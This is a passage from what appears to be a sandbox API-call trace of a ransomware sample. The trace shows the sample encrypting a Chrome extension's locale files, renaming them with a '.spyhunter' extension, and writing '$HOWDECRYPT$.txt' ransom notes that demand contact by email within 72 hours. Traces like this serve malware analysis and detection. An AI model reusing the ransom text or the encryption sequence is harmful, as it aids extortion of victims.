lpNumberOfBytesWritten=0x25ceb8c*=0x127, lpOverlapped=0x0) returned 1 [0160.187] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.187] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb8c*=0x2ac, lpOverlapped=0x0) returned 1 [0160.187] CloseHandle (hObject=0x178) returned 1 [0160.188] GetProcessHeap () returned 0x2c0000 [0160.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f190b0 | out: hHeap=0x2c0000) returned 1 [0160.188] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb28 | out: pbBuffer=0x25ceb28) returned 1 [0160.188] GetProcessHeap () returned 0x2c0000 [0160.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.188] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb20*=0x30) returned 1 [0160.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json") returned 155 [0160.188] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.189] GetProcessHeap () returned 0x2c0000 [0160.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.189] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceae4*=0xcd, lpOverlapped=0x0) returned 1 [0160.189] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.190] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x25ceae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceae4*=0xcd, lpOverlapped=0x0) returned 1 [0160.190] GetProcessHeap () returned 0x2c0000 [0160.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.190] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.190] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceae4, lpOverlapped=0x0 | out: lpBuffer=0x25ceb24*, lpNumberOfBytesWritten=0x25ceae4*=0x4, lpOverlapped=0x0) returned 1 [0160.190] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceae4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceae4*=0x30, lpOverlapped=0x0) returned 1 [0160.190] CloseHandle (hObject=0x178) returned 1 [0160.190] GetProcessHeap () returned 0x2c0000 [0160.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.190] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.spyhunter") returned 165 [0160.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\messages.json.spyhunter")) returned 1 [0160.191] GetProcessHeap () returned 0x2c0000 [0160.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.191] GetProcessHeap () returned 0x2c0000 [0160.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.192] GetProcessHeap () returned 0x2c0000 [0160.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18f28 | out: hHeap=0x2c0000) returned 1 [0160.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.192] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.192] WriteFile (in: hFile=0x178, lpBuffer=0x25cea5b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb84, lpOverlapped=0x0 | out: lpBuffer=0x25cea5b*, lpNumberOfBytesWritten=0x25ceb84*=0x127, lpOverlapped=0x0) returned 1 [0160.193] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.193] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb84*=0x2ac, lpOverlapped=0x0) returned 1 [0160.194] CloseHandle (hObject=0x178) returned 1 [0160.194] GetProcessHeap () returned 0x2c0000 [0160.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18da0 | out: hHeap=0x2c0000) returned 1 [0160.194] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb20 | out: pbBuffer=0x25ceb20) returned 1 [0160.194] GetProcessHeap () returned 0x2c0000 [0160.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.194] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb18*=0x30) returned 1 [0160.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.195] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json") returned 155 [0160.195] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.195] GetProcessHeap () returned 0x2c0000 [0160.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.195] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceadc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceadc*=0x125, lpOverlapped=0x0) returned 1 [0160.196] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffedb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.196] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x125, lpNumberOfBytesWritten=0x25ceadc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceadc*=0x125, lpOverlapped=0x0) returned 1 [0160.196] GetProcessHeap () returned 0x2c0000 [0160.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.196] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.196] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceadc, lpOverlapped=0x0 | out: lpBuffer=0x25ceb1c*, lpNumberOfBytesWritten=0x25ceadc*=0x4, lpOverlapped=0x0) returned 1 [0160.197] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceadc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceadc*=0x30, lpOverlapped=0x0) returned 1 [0160.197] CloseHandle (hObject=0x178) returned 1 [0160.197] GetProcessHeap () returned 0x2c0000 [0160.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.197] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.spyhunter") returned 165 [0160.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json.spyhunter")) returned 1 [0160.198] GetProcessHeap () returned 0x2c0000 [0160.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.198] GetProcessHeap () returned 0x2c0000 [0160.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.198] GetProcessHeap () returned 0x2c0000 [0160.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18c18 | out: hHeap=0x2c0000) returned 1 [0160.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.199] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.199] WriteFile (in: hFile=0x178, lpBuffer=0x25cea53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb7c, lpOverlapped=0x0 | out: lpBuffer=0x25cea53*, lpNumberOfBytesWritten=0x25ceb7c*=0x127, lpOverlapped=0x0) returned 1 [0160.200] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.200] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb7c*=0x2ac, lpOverlapped=0x0) returned 1 [0160.200] CloseHandle (hObject=0x178) returned 1 [0160.200] GetProcessHeap () returned 0x2c0000 [0160.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18a90 | out: hHeap=0x2c0000) returned 1 [0160.200] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb18 | out: pbBuffer=0x25ceb18) returned 1 [0160.200] GetProcessHeap () returned 0x2c0000 [0160.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.200] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb10*=0x30) returned 1 [0160.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.201] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json") returned 155 [0160.201] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.201] GetProcessHeap () returned 0x2c0000 [0160.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.201] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cead4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cead4*=0x115, lpOverlapped=0x0) returned 1 [0160.202] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffeeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.202] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x115, lpNumberOfBytesWritten=0x25cead4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cead4*=0x115, lpOverlapped=0x0) returned 1 [0160.202] GetProcessHeap () returned 0x2c0000 [0160.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.202] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.202] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cead4, lpOverlapped=0x0 | out: lpBuffer=0x25ceb14*, lpNumberOfBytesWritten=0x25cead4*=0x4, lpOverlapped=0x0) returned 1 [0160.203] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cead4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cead4*=0x30, lpOverlapped=0x0) returned 1 [0160.203] CloseHandle (hObject=0x178) returned 1 [0160.203] GetProcessHeap () returned 0x2c0000 [0160.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.203] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.spyhunter") returned 165 [0160.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.spyhunter")) returned 1 [0160.204] GetProcessHeap () returned 0x2c0000 [0160.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.204] GetProcessHeap () returned 0x2c0000 [0160.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.204] GetProcessHeap () returned 0x2c0000 [0160.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18908 | out: hHeap=0x2c0000) returned 1 [0160.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.205] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.205] WriteFile (in: hFile=0x178, lpBuffer=0x25cea4b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceb74, lpOverlapped=0x0 | out: lpBuffer=0x25cea4b*, lpNumberOfBytesWritten=0x25ceb74*=0x127, lpOverlapped=0x0) returned 1 [0160.206] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.206] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceb74, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceb74*=0x2ac, lpOverlapped=0x0) returned 1 [0160.206] CloseHandle (hObject=0x178) returned 1 [0160.206] GetProcessHeap () returned 0x2c0000 [0160.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18780 | out: hHeap=0x2c0000) returned 1 [0160.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb10 | out: pbBuffer=0x25ceb10) returned 1 [0160.206] GetProcessHeap () returned 0x2c0000 [0160.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.206] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb08*=0x30) returned 1 [0160.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, 